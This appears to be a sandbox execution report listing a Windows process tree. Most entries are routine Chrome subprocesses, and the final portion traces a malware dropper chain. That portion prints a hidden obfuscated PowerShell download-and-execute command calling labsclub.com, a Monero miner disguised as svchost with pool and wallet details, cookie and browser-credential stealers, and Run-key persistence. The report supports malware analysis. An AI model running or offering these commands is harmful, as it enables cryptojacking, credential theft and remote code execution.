C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1608 /prefetch:220⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2656 /prefetch:120⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2644 /prefetch:120⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:120⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3924 /prefetch:120⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3792 /prefetch:120⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3616 /prefetch:120⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3452 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4092 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4324 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4572 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4840 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5188 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3588 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings20⤵
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff7e87d7740,0x7ff7e87d7750,0x7ff7e87d776021⤵
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4896 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4204 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4700 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2100 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3368 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3440 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3376 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3404 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1688 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4580 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2120 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3388 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2072 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3880 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1592 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1668 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4156 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1436 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4536 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3804 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3972 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2156 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4604 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4660 /prefetch:120⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4432 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4436 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5380 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4604 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5408 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4088 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4060 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=920 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5744 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5640 /prefetch:120⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4808 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5188 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3864 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5756 /prefetch:120⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3528 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5384 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1784 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4444 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=3636 /prefetch:220⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4624 /prefetch:820⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1540 /prefetch:820⤵
-
-
-
-
-
-
C:\Windows\regedit.exeregedit /s chrome-set.reg16⤵
- Runs .reg file with regedit
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exeparse.exe -f json -b firefox16⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exeparse.exe -f json -b chrome16⤵
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exeparse.exe -f json -b edge16⤵
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-VRSRA.tmp\DataFinder.exe"C:\Users\Admin\AppData\Local\Temp\is-VRSRA.tmp\DataFinder.exe" /Verysilent12⤵
- Adds Run key to start application
-
C:\Users\Admin\Services.exe"C:\Users\Admin\Services.exe"13⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -B --coin=monero --asm=auto --cpu-memory-pool=-1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-us-east1.nanopool.org:14433 --user=42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s --pass= --cpu-max-threads-hint=50 --donate-level=5 --unam-idle-wait=5 --unam-idle-cpu=0 --nicehash --tls --unam-stealth14⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-VRSRA.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-VRSRA.tmp\Delta.exe" /Verysilent12⤵
-
C:\Users\Admin\AppData\Local\Temp\is-FKMBH.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-FKMBH.tmp\Delta.tmp" /SL5="$901DC,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-VRSRA.tmp\Delta.exe" /Verysilent13⤵
-
C:\Users\Admin\AppData\Local\Temp\is-5VB1A.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-5VB1A.tmp\Setup.exe" /VERYSILENT14⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & erase C:\Users\Admin\AppData\Local\Temp\is-5VB1A.tmp\Setup.exe & exit15⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f16⤵
- Kills process with taskkill
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-VRSRA.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-VRSRA.tmp\zznote.exe" /Verysilent12⤵
-
C:\Users\Admin\AppData\Local\Temp\is-12SRB.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-12SRB.tmp\zznote.tmp" /SL5="$B01DC,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-VRSRA.tmp\zznote.exe" /Verysilent13⤵
-
C:\Users\Admin\AppData\Local\Temp\is-BUGED.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-BUGED.tmp\jg4_4jaa.exe" /silent14⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-VRSRA.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-VRSRA.tmp\hjjgaa.exe" /Verysilent12⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\srb4lew1eed\vict.exe"C:\Users\Admin\AppData\Local\Temp\srb4lew1eed\vict.exe" /VERYSILENT /id=5358⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-H9O65.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-H9O65.tmp\vict.tmp" /SL5="$10320,870426,780800,C:\Users\Admin\AppData\Local\Temp\srb4lew1eed\vict.exe" /VERYSILENT /id=5359⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-4B6DU.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-4B6DU.tmp\wimapi.exe" 53510⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\KIlxPNe3u.exe"C:\Users\Admin\AppData\Local\Temp\KIlxPNe3u.exe"11⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\KIlxPNe3u.exe"C:\Users\Admin\AppData\Local\Temp\KIlxPNe3u.exe"12⤵
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"12⤵
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nldl3vxhzik\qqdigrfzox0.exe"C:\Users\Admin\AppData\Local\Temp\nldl3vxhzik\qqdigrfzox0.exe" testparams8⤵
-
C:\Users\Admin\AppData\Roaming\lbgknkoam1d\gxfhjqi30he.exe"C:\Users\Admin\AppData\Roaming\lbgknkoam1d\gxfhjqi30he.exe" /VERYSILENT /p=testparams9⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-PQRBN.tmp\gxfhjqi30he.tmp"C:\Users\Admin\AppData\Local\Temp\is-PQRBN.tmp\gxfhjqi30he.tmp" /SL5="$302B6,1611272,61440,C:\Users\Admin\AppData\Roaming\lbgknkoam1d\gxfhjqi30he.exe" /VERYSILENT /p=testparams10⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3pxadza0p0i\4wqsrf14wfc.exe"C:\Users\Admin\AppData\Local\Temp\3pxadza0p0i\4wqsrf14wfc.exe" /ustwo INSTALL8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 6489⤵
- Program crash
- Drops file in Windows directory
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 6769⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 6569⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 6529⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 8809⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 9369⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 11849⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 11449⤵
- Program crash
-
-
